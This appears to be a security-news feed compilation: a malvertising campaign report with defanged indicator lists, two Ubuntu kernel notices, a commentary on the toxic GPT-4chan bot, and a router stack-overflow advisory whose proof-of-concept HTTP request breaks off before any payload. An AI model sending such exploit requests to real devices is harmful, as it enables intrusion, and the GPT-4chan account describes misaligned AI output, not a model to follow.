We catch up with some old acquaintances that just aren't ready to hang up the towel just yet.
The post MakeMoney malvertising campaign adds fake update template appeared first on Malwarebytes Labs.

Malware authors and distributors are following the ebbs and flow of the threat landscape. One campaign we have tracked for a numbers of years recently introduced a new scheme to possibly completely move away from drive-by downloads via exploit kit.

In this quick blog post, we will look at this new attack chain and link it with previous activity from what we believe are the same threat actors.

**FakeUpdates (SocGholish) lookalike**

Our researcher Fillip Mouliatis identified a malvertising campaign leading to a fake Firefox update. The template is strongly inspired from similar schemes and in particular the one distributed by the FakeUpdates (SocGholish) threat actors.

However distribution and implementation are very different. Unlike FakeUpdates which uses compromised websites to push their template, this one is driven via malvertising. Please note the IP addresses involved in the redirection infrastructure as we will come back to them in a moment.

The template itself is much more simplified and appears to be in development with a fake Firefox update that contains a couple of scripts that pull down an encrypted payload. The initial executable consists of a loader which retrieves a piece of Adware detected as BrowserAssistant. This payload was seen before and interestingly through a similar malvertising campaign involving the RIG exploit kit.

**MakeMoney connection**

The malvertising infrastructure is essentially the same one that was used in numerous drive-by campaigns with exploit kits since late 2019. For some reason the threat actors are reusing the same servers in Russia and naming their malvertising gates after different ad networks.

Security researcher @na0\_sec saw the “MakeMoney gate”, named after the domain makemoneywithus\[.\]work (**188.225.75.54**), redirect the Fallout exploit kit in October 2020, although it mostly used RIG EK for several years. Probably the earliest instance of this threat group was seen in December 2019 via the gate gettime\[.\]xyz (**185.220.35.26)**.

Looking at this infrastructure shows that the group reused a few servers quite predictably during these years between AS59504 vpsville and AS9123 TimeWeb. For example, gettime\[.\]xyz was hosted on the same server (185.220.35.26) as makemoneyeazzywith\[.\]me. Staying with the MakeMoney theme, we see makemoneywith\[.\]us on 188.225.75\[.\]54. That server was likely hosting a Keitaro TDS given such hostnames as keitarotrafficdelivery\[.\]xyz.

There is also activity on **185.220.33.3**, **185.230.140.210** and **188.225.75.54** hosting a number of impersonation hostnames such as magicpropeller\[.\]xyz (PropellerAds), magicpopcash\[.\]xyz (PopCash).

We find it interesting that the same threat actors remained faithful to RIG EK for so long during a period where exploit kits were going out of business. They also seemed to poke fun at the same ad networks they were abusing, unless the choice for names associated with their gates was motivated by sorting out their upstream traffic.

We don’t believe we have seen the last of this threat group. Having said that, their latest social engineering scheme could use some improvements to remove some blatant typos while their server-side infrastructure could be tidied up.

**Indicators of Compromise**

**IP addresses (malvertising domains, gates)**

185.220.35.26  
188.225.75.54  
185.220.33.3  
185.230.140.210

**IP addresses (fake template)**

188.227.107.121  
188.227.107.92

**Domains (malvertising domains, gates)**

adcashtds2\[.\]xyz  
adcashtdssystem\[.\]site  
adsinside\[.\]xyz  
adsterramagic\[.\]me  
adstexx\[.\]xyz  
allmagnew\[.\]xyz  
alltomag\[.\]xyz  
an-era\[.\]shop  
ankgomag\[.\]xyz  
anklexit\[.\]online  
ankltrafficexit\[.\]xyz  
ankmagicgo\[.\]xyz  
blackexit\[.\]xyz  
ccgmaining\[.\]life  
ccgmaining\[.\]live  
ccgmaining\[.\]work  
clickadusweep\[.\]vip  
clickadusweeps\[.\]vip  
clickadutds\[.\]xyz  
clicksdeliveryserver\[.\]space  
clicktds2\[.\]xyz  
cryptomoneyinside\[.\]xyz  
cryptomoneyinsider\[.\]biz  
cryptomoneyinsider\[.\]link  
cryptomoneyinsider\[.\]site  
cryptomoneyinsider\[.\]work  
cryptomoneyinsiders\[.\]com  
cryptomoneyinsiders\[.\]site  
cryptomoneyinsiders\[.\]work  
cryptomoneytds\[.\]xyz  
cryptopaycard\[.\]shop  
cryptosuite\[.\]pro  
cryptosuitetds\[.\]com  
cryptotraffic\[.\]vip  
cryptotraffictds\[.\]online  
cryptotraffictdss\[.\]xyz  
cryptozerotds\[.\]xyz  
daiichisankyo-hc\[.\]live  
earncryptomoney\[.\]info  
exitmagall\[.\]xyz  
extradeliverytraffic\[.\]com  
extramoneymaker\[.\]vip  
familylabs\[.\]xyz  
fujimi\[.\]fun

gettime\[.\]xyz  
hilldeliveryexit\[.\]xyz  
hillex\[.\]xyz  
hilllandings\[.\]xyz  
hillmag\[.\]xyz  
hillmagnew\[.\]xyz  
hilltopmagic\[.\]xyz  
hilltoptds\[.\]xyz  
hilltoptdsserver\[.\]xyz  
hilltoptdsservers\[.\]fun  
hilltoptrafficdelivery\[.\]com  
hilltoptrafficdelivery\[.\]xyz  
jillstuart-floranotisjillstu\[.\]art  
k-to-kd\[.\]me  
keitarotrafficdelivery\[.\]com  
keitarotrafficdelivery\[.\]xyz  
lahsahal\[.\]site  
magcheckall\[.\]me  
magicadss\[.\]xyz  
magicadsterra\[.\]xyz  
magicclickadu\[.\]xyz  
magickhill\[.\]xyz  
magickpeoplenew\[.\]xyz  
magicpopcash\[.\]xyz  
magicpropeller\[.\]xyz  
magicself\[.\]xyz  
magiczero\[.\]xyz  
makemoneyeazzywith\[.\]me  
makemoneynowwith\[.\]me  
makemoneywith\[.\]us  
makemoneywithus\[.\]work  
mizuno\[.\]casa  
money365\[.\]xyz  
myallexit\[.\]xyz  
myjobsy\[.\]com  
nawa-store\[.\]com  
newallfrommag\[.\]xyz  
newzamenaadc\[.\]xyz  
newzamenaclick\[.\]xyz  
newzamenaself\[.\]xyz  
newzamenazero\[.\]xyz  
nippon-mask\[.\]site  
northfarmstock\[.\]xyz  
offers\[.\]myjobsy\[.\]com

offersstudioex\[.\]live  
openphoto\[.\]xyz  
partners\[.\]usemoney\[.\]xyz  
prelandingpages\[.\]xyz  
promodigital\[.\]me  
propellermagic\[.\]xyz  
sberbank\[.\]hourscareer\[.\]com  
sberjob\[.\]hourscareer\[.\]com  
selfadtracker1\[.\]online  
selfadtrackerexit\[.\]xyz  
selftraffictds\[.\]xyz  
selfyourads\[.\]xyz  
shop\[.\]mizuno\[.\]casa  
supersports\[.\]fun  
surprise\[.\]yousweeps\[.\]vip  
tracker\[.\]usemoney\[.\]xyz  
traffic\[.\]selfadtracker1\[.\]online  
traffic\[.\]usemoney\[.\]xyz  
trafficdeliveryclick\[.\]xyz  
trafficdeliveryoffers\[.\]com  
trafficdeliverysystem\[.\]world  
traffictrackerself\[.\]xyz  
tryphoto\[.\]xyz  
trytime\[.\]xyz  
usehouse\[.\]xyz  
usemoney\[.\]life  
usemoney\[.\]xyz  
ymalljp\[.\]com  
yousweeps\[.\]vip  
zamenaad\[.\]xyz  
zamenaclick\[.\]xyz  
zamenahil\[.\]xyz  
zamenazer\[.\]xyz  
zapasnoiadc\[.\]xyz  
zapasnoiclick\[.\]xyz  
zapasnoiself\[.\]xyz  
zapasnoizero\[.\]xyz  
zermag\[.\]xyz  
zernewmagcheck\[.\]xyz  
zerocryptocard\[.\]shop  
zeroexit\[.\]xyz  
zerok2exit\[.\]xyz  
zeroparktraffic\[.\]xyz  
zeroparktrakeroutside\[.\]shop  
zerotdspark\[.\]space  
zerotracker\[.\]shop

**References**

https://twitter.com/MBThreatIntel/status/1483235125827571715  
https://twitter.com/MBThreatIntel/status/1361824286499950601  
https://twitter.com/malware\_traffic/status/1412128664721014785  
https://twitter.com/malware\_traffic/status/1357513424566124548  
https://twitter.com/FaLconIntel/status/1351739449932083200  
https://twitter.com/tkanalyst/status/1226125887256416256  
https://twitter.com/david\_jursa/status/1346562997305696262  
https://twitter.com/nao\_sec/status/1334289601125445633  
https://twitter.com/FaLconIntel/status/1298661757943087105  
https://twitter.com/nao\_sec/status/1294871134001799168  
https://twitter.com/david\_jursa/status/1232996830520193024  
https://twitter.com/david\_jursa/status/1229354505583628288  
https://twitter.com/nao\_sec/status/1211975197219151876

MakeMoney malvertising campaign adds fake update template

Ubuntu Security Notice 5469-1 - It was discovered that the Linux kernel did not properly restrict access to the kernel debugger when booted in secure boot environments. A privileged attacker could use this to bypass UEFI Secure Boot restrictions. Aaron Adams discovered that the netfilter subsystem in the Linux kernel did not properly handle the removal of stateful expressions in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5469-1  
June 08, 2022

linux, linux-aws, linux-azure, linux-gcp, linux-gke, linux-ibm,  
linux-intel-iotg, linux-kvm, linux-lowlatency, linux-oracle, linux-raspi  
vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux: Linux kernel  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems  
- linux-azure: Linux kernel for Microsoft Azure Cloud systems  
- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-gke: Linux kernel for Google Container Engine (GKE) systems  
- linux-ibm: Linux kernel for IBM cloud systems  
- linux-intel-iotg: Linux kernel for Intel IoT platforms  
- linux-kvm: Linux kernel for cloud environments  
- linux-lowlatency: Linux low latency kernel  
- linux-oracle: Linux kernel for Oracle Cloud systems  
- linux-raspi: Linux kernel for Raspberry Pi systems

Details:

It was discovered that the Linux kernel did not properly restrict access to  
the kernel debugger when booted in secure boot environments. A privileged  
attacker could use this to bypass UEFI Secure Boot restrictions.  
(CVE-2022-21499)

Aaron Adams discovered that the netfilter subsystem in the Linux kernel did  
not properly handle the removal of stateful expressions in some situations,  
leading to a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or execute arbitrary code.  
(CVE-2022-1966)

Billy Jheng Bing Jhong discovered that the CIFS network file system  
implementation in the Linux kernel did not properly validate arguments to  
ioctl() in some situations. A local attacker could possibly use this to  
cause a denial of service (system crash). (CVE-2022-0168)

Hu Jiahui discovered that multiple race conditions existed in the Advanced  
Linux Sound Architecture (ALSA) framework, leading to use-after-free  
vulnerabilities. A local attacker could use these to cause a denial of  
service (system crash) or possibly execute arbitrary code. (CVE-2022-1048)

Qiuhao Li, Gaoning Pan and Yongkang Jia discovered that the KVM  
implementation in the Linux kernel did not properly perform guest page  
table updates in some situations. An attacker in a guest vm could possibly  
use this to crash the host OS. (CVE-2022-1158)

It was discovered that the implementation of the 6pack and mkiss protocols  
in the Linux kernel did not handle detach events properly in some  
situations, leading to a use-after-free vulnerability. A local attacker  
could possibly use this to cause a denial of service (system crash).  
(CVE-2022-1195)

Duoming Zhou discovered that the 6pack protocol implementation in the Linux  
kernel did not handle detach events properly in some situations, leading to  
a use-after-free vulnerability. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-1198)

Duoming Zhou discovered that the AX.25 amateur radio protocol  
implementation in the Linux kernel did not handle detach events properly in  
some situations. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2022-1199)

Duoming Zhou discovered race conditions in the AX.25 amateur radio protocol  
implementation in the Linux kernel during device detach operations. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-1204)

Duoming Zhou discovered race conditions in the AX.25 amateur radio protocol  
implementation in the Linux kernel, leading to use-after-free  
vulnerabilities. A local attacker could possibly use this to cause a denial  
of service (system crash). (CVE-2022-1205)

Qiuhao Li, Gaoning Pan, and Yongkang Jia discovered that the kvm  
implementation in the Linux kernel did not handle releasing a virtual cpu  
properly. A local attacker in a guest VM coud possibly use this to cause a  
denial of service (host system crash). (CVE-2022-1263)

It was discovered that the PF_KEYv2 implementation in the Linux kernel did  
not properly initialize kernel memory in some situations. A local attacker  
could use this to expose sensitive information (kernel memory).  
(CVE-2022-1353)

It was discovered that the implementation of X.25 network protocols in the  
Linux kernel did not terminate link layer sessions properly. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-1516)

It was discovered that the ACRN Hypervisor Service Module implementation in  
the Linux kernel did not properly deallocate memory in some situations. A  
local privileged attacker could possibly use this to cause a denial of  
service (memory exhaustion). (CVE-2022-1651)

It was discovered that the RxRPC session socket implementation in the Linux  
kernel did not properly handle ioctls called when no security protocol is  
given. A local attacker could use this to cause a denial of service (system  
crash) or possibly expose sensitive information (kernel memory).  
(CVE-2022-1671)

Ziming Zhang discovered that the netfilter subsystem in the Linux kernel  
did not properly validate sets with multiple ranged fields. A local  
attacker could use this to cause a denial of service or execute arbitrary  
code. (CVE-2022-1972)

赵子轩 discovered that the 802.2 LLC type 2 driver in the Linux kernel did not  
properly perform reference counting in some error conditions. A local  
attacker could use this to cause a denial of service. (CVE-2022-28356)

It was discovered that the 8 Devices USB2CAN interface implementation in  
the Linux kernel did not properly handle certain error conditions, leading  
to a double-free. A local attacker could possibly use this to cause a  
denial of service (system crash). (CVE-2022-28388)

It was discovered that the Microchip CAN BUS Analyzer interface  
implementation in the Linux kernel did not properly handle certain error  
conditions, leading to a double-free. A local attacker could possibly use  
this to cause a denial of service (system crash). (CVE-2022-28389)

It was discovered that the EMS CAN/USB interface implementation in the  
Linux kernel contained a double-free vulnerability when handling certain  
error conditions. A local attacker could use this to cause a denial of  
service (memory exhaustion). (CVE-2022-28390)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  linux-image-5.15.0-1007-ibm     5.15.0-1007.8  
  linux-image-5.15.0-1008-gcp     5.15.0-1008.12  
  linux-image-5.15.0-1008-gke     5.15.0-1008.10  
  linux-image-5.15.0-1008-intel-iotg  5.15.0-1008.11  
  linux-image-5.15.0-1009-oracle  5.15.0-1009.12  
  linux-image-5.15.0-1010-azure   5.15.0-1010.12  
  linux-image-5.15.0-1010-kvm     5.15.0-1010.11  
  linux-image-5.15.0-1011-aws     5.15.0-1011.14  
  linux-image-5.15.0-1011-raspi   5.15.0-1011.13  
  linux-image-5.15.0-1011-raspi-nolpae  5.15.0-1011.13  
  linux-image-5.15.0-37-generic   5.15.0-37.39  
  linux-image-5.15.0-37-generic-64k  5.15.0-37.39  
  linux-image-5.15.0-37-generic-lpae  5.15.0-37.39  
  linux-image-5.15.0-37-lowlatency  5.15.0-37.39  
  linux-image-5.15.0-37-lowlatency-64k  5.15.0-37.39  
  linux-image-aws                 5.15.0.1011.12  
  linux-image-azure               5.15.0.1010.10  
  linux-image-gcp                 5.15.0.1008.8  
  linux-image-generic             5.15.0.37.39  
  linux-image-generic-64k         5.15.0.37.39  
  linux-image-generic-hwe-22.04   5.15.0.37.39  
  linux-image-generic-lpae        5.15.0.37.39  
  linux-image-generic-lpae-hwe-22.04  5.15.0.37.39  
  linux-image-gke                 5.15.0.1008.12  
  linux-image-gke-5.15            5.15.0.1008.12  
  linux-image-ibm                 5.15.0.1007.7  
  linux-image-intel-iotg          5.15.0.1008.9  
  linux-image-kvm                 5.15.0.1010.9  
  linux-image-lowlatency          5.15.0.37.37  
  linux-image-lowlatency-64k      5.15.0.37.37  
  linux-image-lowlatency-64k-hwe-22.04  5.15.0.37.37  
  linux-image-lowlatency-hwe-22.04  5.15.0.37.37  
  linux-image-oem-20.04           5.15.0.37.39  
  linux-image-oracle              5.15.0.1009.8  
  linux-image-raspi               5.15.0.1011.10  
  linux-image-raspi-nolpae        5.15.0.1011.10  
  linux-image-virtual             5.15.0.37.39  
  linux-image-virtual-hwe-22.04   5.15.0.37.39

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
  https://ubuntu.com/security/notices/USN-5469-1  
  CVE-2022-0168, CVE-2022-1048, CVE-2022-1158, CVE-2022-1195,  
  CVE-2022-1198, CVE-2022-1199, CVE-2022-1204, CVE-2022-1205,  
  CVE-2022-1263, CVE-2022-1353, CVE-2022-1516, CVE-2022-1651,  
  CVE-2022-1671, CVE-2022-1966, CVE-2022-1972, CVE-2022-21499,  
  CVE-2022-28356, CVE-2022-28388, CVE-2022-28389, CVE-2022-28390

Package Information:  
  https://launchpad.net/ubuntu/+source/linux/5.15.0-37.39  
  https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1011.14  
  https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1010.12  
  https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1008.12  
  https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1008.10  
  https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1007.8  
  https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1008.11  
  https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1010.11  
  https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-37.39  
  https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1009.12  
  https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1011.13

Ubuntu Security Notice USN-5469-1

Ubuntu Security Notice 5468-1 - It was discovered that the Linux kernel did not properly restrict access to the kernel debugger when booted in secure boot environments. A privileged attacker could use this to bypass UEFI Secure Boot restrictions. Aaron Adams discovered that the netfilter subsystem in the Linux kernel did not properly handle the removal of stateful expressions in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or execute arbitrary code.

    =========================================================================Ubuntu Security Notice USN-5468-1June 08, 2022linux, linux-aws, linux-aws-5.13, linux-azure, linux-azure-5.13,linux-gcp, linux-gcp-5.13, linux-hwe-5.13, linux-intel-5.13, linux-kvm,linux-oracle, linux-oracle-5.13, linux-raspi vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 21.10- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.13: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.13: Linux kernel for Microsoft Azure cloud systems- linux-gcp-5.13: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.13: Linux hardware enablement (HWE) kernel- linux-intel-5.13: Linux kernel for Intel IOTG- linux-oracle-5.13: Linux kernel for Oracle Cloud systemsDetails:It was discovered that the Linux kernel did not properly restrict access tothe kernel debugger when booted in secure boot environments. A privilegedattacker could use this to bypass UEFI Secure Boot restrictions.(CVE-2022-21499)Aaron Adams discovered that the netfilter subsystem in the Linux kernel didnot properly handle the removal of stateful expressions in some situations,leading to a use-after-free vulnerability. A local attacker could use thisto cause a denial of service (system crash) or execute arbitrary code.(CVE-2022-1966)Qiuhao Li, Gaoning Pan and Yongkang Jia discovered that the KVMimplementation in the Linux kernel did not properly perform guest pagetable updates in some situations. An attacker in a guest vm could possiblyuse this to crash the host OS. (CVE-2022-1158)Ziming Zhang discovered that the netfilter subsystem in the Linux kerneldid not properly validate sets with multiple ranged fields. A localattacker could use this to cause a denial of service or execute arbitrarycode. (CVE-2022-1972)It was discovered that the USB Gadget file system interface in the Linuxkernel contained a use-after-free vulnerability. A local attacker could usethis to cause a denial of service (system crash) or possibly executearbitrary code. (CVE-2022-24958)It was discovered that the EMS CAN/USB interface implementation in theLinux kernel contained a double-free vulnerability when handling certainerror conditions. A local attacker could use this to cause a denial ofservice (memory exhaustion). (CVE-2022-28390)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 21.10:  linux-image-5.13.0-1027-kvm     5.13.0-1027.29  linux-image-5.13.0-1028-aws     5.13.0-1028.31  linux-image-5.13.0-1028-azure   5.13.0-1028.33  linux-image-5.13.0-1030-gcp     5.13.0-1030.36  linux-image-5.13.0-1031-raspi   5.13.0-1031.34  linux-image-5.13.0-1031-raspi-nolpae  5.13.0-1031.34  linux-image-5.13.0-1033-oracle  5.13.0-1033.39  linux-image-5.13.0-48-generic   5.13.0-48.54  linux-image-5.13.0-48-generic-64k  5.13.0-48.54  linux-image-5.13.0-48-generic-lpae  5.13.0-48.54  linux-image-5.13.0-48-lowlatency  5.13.0-48.54  linux-image-aws                 5.13.0.1028.28  linux-image-azure               5.13.0.1028.27  linux-image-gcp                 5.13.0.1030.27  linux-image-generic             5.13.0.48.56  linux-image-generic-64k         5.13.0.48.56  linux-image-generic-lpae        5.13.0.48.56  linux-image-gke                 5.13.0.1030.27  linux-image-kvm                 5.13.0.1027.26  linux-image-lowlatency          5.13.0.48.56  linux-image-oem-20.04           5.13.0.48.56  linux-image-oracle              5.13.0.1033.32  linux-image-raspi               5.13.0.1031.35  linux-image-raspi-nolpae        5.13.0.1031.35  linux-image-virtual             5.13.0.48.56Ubuntu 20.04 LTS:  linux-image-5.13.0-1014-intel   5.13.0-1014.15  linux-image-5.13.0-1028-aws     5.13.0-1028.31~20.04.1  linux-image-5.13.0-1028-azure   5.13.0-1028.33~20.04.1  linux-image-5.13.0-1030-gcp     5.13.0-1030.36~20.04.1  linux-image-5.13.0-1033-oracle  5.13.0-1033.39~20.04.1  linux-image-5.13.0-48-generic   5.13.0-48.54~20.04.1  linux-image-5.13.0-48-generic-64k  5.13.0-48.54~20.04.1  linux-image-5.13.0-48-generic-lpae  5.13.0-48.54~20.04.1  linux-image-5.13.0-48-lowlatency  5.13.0-48.54~20.04.1  linux-image-aws                 5.13.0.1028.31~20.04.22  linux-image-azure               5.13.0.1028.33~20.04.17  linux-image-gcp                 5.13.0.1030.36~20.04.1  linux-image-generic-64k-hwe-20.04  5.13.0.48.54~20.04.30  linux-image-generic-hwe-20.04   5.13.0.48.54~20.04.30  linux-image-generic-lpae-hwe-20.04  5.13.0.48.54~20.04.30  linux-image-intel               5.13.0.1014.14  linux-image-lowlatency-hwe-20.04  5.13.0.48.54~20.04.30  linux-image-oracle              5.13.0.1033.39~20.04.1  linux-image-virtual-hwe-20.04   5.13.0.48.54~20.04.30After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-5468-1  CVE-2022-1158, CVE-2022-1966, CVE-2022-1972, CVE-2022-21499,  CVE-2022-24958, CVE-2022-28390Package Information:  https://launchpad.net/ubuntu/+source/linux/5.13.0-48.54  https://launchpad.net/ubuntu/+source/linux-aws/5.13.0-1028.31  https://launchpad.net/ubuntu/+source/linux-azure/5.13.0-1028.33  https://launchpad.net/ubuntu/+source/linux-gcp/5.13.0-1030.36  https://launchpad.net/ubuntu/+source/linux-kvm/5.13.0-1027.29  https://launchpad.net/ubuntu/+source/linux-oracle/5.13.0-1033.39  https://launchpad.net/ubuntu/+source/linux-raspi/5.13.0-1031.34  https://launchpad.net/ubuntu/+source/linux-aws-5.13/5.13.0-1028.31~20.04.1  https://launchpad.net/ubuntu/+source/linux-azure-5.13/5.13.0-1028.33~20.04.1  https://launchpad.net/ubuntu/+source/linux-gcp-5.13/5.13.0-1030.36~20.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-5.13/5.13.0-48.54~20.04.1  https://launchpad.net/ubuntu/+source/linux-intel-5.13/5.13.0-1014.15  https://launchpad.net/ubuntu/+source/linux-oracle-5.13/5.13.0-1033.39~20.04.1

Ubuntu Security Notice USN-5468-1

The creation of a foul-mouthed chat bot called GPT-4chan re-triggered the discussion about how we want to use and regulate AI and ML.
The post Awful 4chan chat bot spouts racial slurs and antisemitic abuse appeared first on Malwarebytes Labs.

> _“A robot may not injure a human being or, through inaction, allow a human being to come to harm”_

Science fiction readers, and many others, will recognize Asimov’s first law of robotics. After reading about a bot called GPT-4chan I was wondering whether we should include:

> _“A bot may not insult a human being or, through interaction, allow a human being to be discriminated”_

GPT-4chan was based on an AI instance trained using 3.3 million threads from 4chan’s infamously toxic Politically Incorrect /pol/ board. Once trained, the creator released the chat bot back onto 4chan. And, no surprise here, the AI behaved just as vile as the posts it was trained on, spouting racial slurs and engaging with antisemitic threads.

While many outside the industry may have found the experiment interesting, serious AI researchers commented that this did not qualify as a serious experiment, but as an unethical one.

**Déjà vu**

Reading the above may cause some people to think they have seen this before. What you may remember reading about is a Microsoft Twitter AI chat bot that went rogue in less than 24 hours. The more someone chats with Tay (the name of the chat bot), said Microsoft, the smarter it gets, learning to engage people through casual and playful conversation.

However, quickly Twitter users proved that artificial intelligence (AI) and machine learning (ML) adhere to the “garbage in, garbage out” law in computer science. Twitter users managed to turn Tay into a racist and misogynist in less than a day.

**GPT-3**

The name GPT-4chan was partly based on the Generative Pre-trained Transformer 3 (GPT-3) language model that uses deep learning to produce human-like text. In January 2022, OpenAI introduced a new version of GPT-3, which should do away with some of the most toxic issues that plagued its predecessor.

Large language models like GPT-3 use vast bodies of text for training. Often these texts originate from the internet. In these texts they encounter the best and worst of what people put down in words. As such, the training material includes toxic language as well as falsehoods. Filtering out offensive language from the training set can make models perform less well, especially in cases where the training data is already sparse. In its new InstructGPT model, OpenAI tries to align language models with user intent on a wide range of tasks by fine-tuning with human feedback.

**Accidental bias**

Despite the obvious potential, recent events have exposed how automated systems can both intentionally and unintentionally lead to bias. For example, women see fewer advertisements about entering into science and technology professions than men do. Not because companies are preferentially targeting men, but as a result derived from the economics of ad sales.

Simply put, when an advertiser pays for digital ads, including postings for jobs in science, technology, engineering and mathematics,  it is more expensive to get female views than male ones. So the algorithm targets men to enhance the number of eyeballs per spent dollar.

Another well-known example is an algorithm that selected new candidates for a job based on the current population of employees. By doing this, the algorithm amplified the outdated model that says some jobs are predominantly done by men, or women.

As AI becomes a mandatory strategic tool across multiple industries, companies using AI as part of their strategies need to accept their roles and responsibilities in reducing the risk and impact of bias inherent in their products and services.

**Regulation**

As you may have guessed, my call for regulation was not a novel idea. In 2020, Google CEO Sundar Pichai stated he felt that AI needed regulation in order to prevent the potential negative consequences of tools including deepfakes and facial recognition. In his mind, this was not a conversation to save for tomorrow while the building and implementing of AI tools is happening today. But by nature, laws and regulations are mostly created as a response to abuse, rather than as a visionary approach of what could go wrong.

**An ongoing discussion**

The responses to the GPT-4chan experiment are another step in an ongoing discussion to determine whether AI and ML are here to save the world or whether they will destroy what’s left of it. This discussion seems pointless. The focus should not be on the product, but on the way in which we use it. As with every new development, we obtain a new tool, which we can wield for good, for evil, or just for profit.

As we pointed out in our 2019 Labs report “When artificial intelligence goes awry: separating science fiction from fact”,

> _“There’s a crucial period in artificial intelligence’s development—in fact, in any technology’s development—where those bringing this infant tech into the world have a choice to develop it responsibly or simply accelerate at all costs.”_

To some, one of the biggest issues of artificial intelligence and machine learning is the impact on the climate. The big issue is that many high-profile ML advances just require a staggering amount of computation.

On that note, at best the GPT-4chan experiment was a waste of energy producing the kind of garbage that humanity, unfortunately, does not need help with.

Don’t be like GPT-4chan!

Awful 4chan chat bot spouts racial slurs and antisemitic abuse

H3C Magic R100 R100V100R005 was discovered to contain a stack overflow vulnerability via the EditMacList parameter at /goform/aspForm.

**H3C magic R100 R100V100R005.bin Stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_201801/1060028\_30005\_0.htm

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through param parameter is passed to V10, and then the matched content is formatted into the stack of V11, V13, V14 and V12 through sscanf function. There is no size check, so there is a stack overflow vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware R100V100R005.bin
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Origin: http://192.168.0.1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    
